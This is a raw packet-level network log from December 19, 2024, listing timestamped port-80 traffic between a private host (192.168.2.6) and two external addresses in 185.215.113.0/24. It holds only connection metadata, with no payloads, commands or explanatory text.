Dec 19, 2024 10:10:30.402849913 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.411382914 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.411437988 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.411500931 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.411555052 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.419445038 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.419466972 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.419501066 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.419536114 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.427640915 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.427697897 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.427726984 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.427783012 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.435950994 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.436007977 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.436156034 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.436204910 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.444490910 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.444580078 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.444634914 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.444686890 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.452805996 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.452863932 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.452876091 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.452925920 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.461508036 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.461548090 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.461608887 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.470391989 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.470429897 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.470454931 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.470489979 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.474867105 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.474922895 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.474925995 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.474983931 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.478920937 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.478984118 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.479036093 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.479091883 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.483503103 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.483556986 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.483560085 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.483612061 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.488292933 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.488344908 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.488356113 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.488409996 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.492867947 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.492902994 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.492925882 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.492961884 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.493012905 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.497442961 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.497519970 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.497543097 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.497596025 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.502067089 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.502126932 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.502134085 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.502187014 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.506742001 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.506800890 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.506875038 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.506927967 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.511205912 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.511241913 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.511295080 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.511295080 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.515642881 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.515727997 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.515773058 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.515829086 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.520109892 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.520183086 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.520260096 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.520317078 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.524439096 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.524504900 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.524573088 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.524629116 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.528728962 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.528811932 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.528853893 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.528913021 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.533010006 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.533070087 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.533193111 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.533251047 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.537225008 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.537282944 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.537354946 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.537411928 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.541503906 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.541557074 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.541623116 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.541676044 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.545700073 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.545756102 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.545844078 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.545907974 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.549844027 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.549902916 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.550046921 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.550106049 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.554248095 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.554311037 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.554322004 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.554378033 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.558208942 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.558274984 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.558289051 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.558340073 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.558403969 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:30.558439970 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:30.558471918 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:30.558516979 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:30.559784889 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:30.562339067 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.562398911 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.562453985 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.562510014 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.566505909 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.566566944 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.566644907 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.566703081 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.570790052 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.570842028 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.570899010 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.574879885 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.574937105 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.574964046 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.575017929 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.579099894 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.579157114 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.579291105 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.579375029 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.583098888 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.583152056 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.583154917 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.583209038 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.587076902 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.587112904 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.587137938 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.587169886 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.591108084 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.591166973 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.591379881 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.591435909 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.595113993 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.595180035 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.595376015 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.595432997 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.597946882 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.598006964 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.598094940 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.598144054 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.600430012 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.600487947 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.600517988 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.600570917 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.603241920 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.603301048 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.603395939 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.603451014 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.606060982 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.606112003 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.606117964 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.606168032 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.608681917 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.608738899 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.608774900 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.608834028 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.611495018 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.611530066 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.611550093 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.611576080 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.613987923 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.614042997 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.614078045 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.614132881 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.616569996 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.616626024 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.616672039 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.616725922 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.619231939 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.619350910 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.619411945 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.621722937 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.621757984 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.621776104 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.621807098 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.624049902 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.624109030 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.624150038 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.624206066 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.626651049 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.626712084 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.626766920 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.626822948 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.629301071 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.629359007 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.629436970 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.629506111 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.631956100 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.632009983 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.632162094 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.632215023 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.634222984 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.634321928 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.634394884 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.636308908 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.636380911 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.636401892 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.638679981 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.638739109 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.638832092 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.638887882 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.640841961 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.640985966 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.641041040 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.642926931 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.642980099 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.642981052 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.643033981 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.645136118 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.645292997 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.645363092 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.647516966 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.647578955 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.647644997 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.647702932 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.650346041 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.650453091 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.650523901 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.652249098 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.652319908 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.652393103 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.654366016 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.654432058 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.654587984 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.654644012 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.656599045 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.656686068 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.656753063 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.658340931 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.658416033 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.658447981 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.658555031 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.660135984 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.660197020 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.660213947 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.660270929 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.662228107 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.662280083 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.662281036 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.662341118 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.664469004 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.664504051 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.664557934 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.666198969 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.666250944 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.666251898 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.666307926 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.668116093 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.668149948 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.668184996 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.668232918 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.669897079 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.669959068 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.670072079 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.670141935 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.671919107 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.671957016 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.671983957 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.672033072 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.673710108 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.673772097 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.673845053 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.673916101 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.675808907 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.675868034 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.675924063 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.675977945 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.677922010 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.677983999 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.678071022 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.678128004 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.679908991 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.679968119 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.680028915 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.680059910 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:30.680120945 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.681782007 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.681896925 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.681960106 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.683115005 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.683176041 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.683283091 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.683352947 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.684751987 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.684787035 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.684818029 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.685950994 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.686542988 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.686598063 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.686661005 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.686717033 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.688260078 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.688328028 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.688369989 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.688417912 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.690005064 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.690041065 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.690076113 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.690109968 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.691766977 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.691802979 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.691859961 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.693448067 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.693607092 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.693684101 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.693737984 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.695209026 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.695288897 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.695389986 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.695446014 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.696932077 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.696985960 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.697047949 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.698613882 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.698848963 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.698905945 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.700619936 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.700671911 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.700875998 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.700932026 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.703345060 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.703380108 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.703402996 CET	49910	80	192.168.2.6	185.215.113.16
